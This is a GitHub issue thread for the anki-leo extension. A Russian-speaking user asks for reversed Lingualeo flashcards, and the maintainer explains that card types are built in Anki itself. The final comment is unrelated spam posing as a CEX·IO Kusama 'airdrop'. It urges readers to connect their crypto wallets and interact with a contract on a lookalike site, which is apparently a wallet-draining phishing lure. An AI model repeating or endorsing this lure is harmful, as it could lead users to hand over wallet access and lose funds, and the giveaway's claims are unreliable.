### ISSUE TITLE
Добавить reverse-карточки

### ISSUE THREAD

**Issue by helpau** [troggy/anki-leo#96]
Было бы хорошо, если бы был тип записей "Lingualeo words basic+reversed". Можно добавить возможность при вызгрузке с Lingualeo выбрать тип записей для карточек.
Сейчас модификация существующего шаблона происходит так:
https://www.reddit.com/r/Anki/comments/csbn82/how_to_add_reverse_option_to_existing_note_type/exed8t7?utm_source=share&utm_medium=web2x&context=3
А вот пример такой карточки:
![image](https://user-images.githubusercontent.com/30323047/130610700-114446bb-1487-4eb7-b0ed-d7778b28ec95.png)

**Comment by troggy** [comment]
интересно. А чего именно сейчас в расширении не хватает, чтобы сделать такой тип карточки?

Как я вижу: расширение выгружает только данные о словах. Типы карточек вы создаёте сами в Анки на свой вкус (на сайте просто пример, его можно менять как угодно), в том числе и reverse-карточки.

**Comment by codelou** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
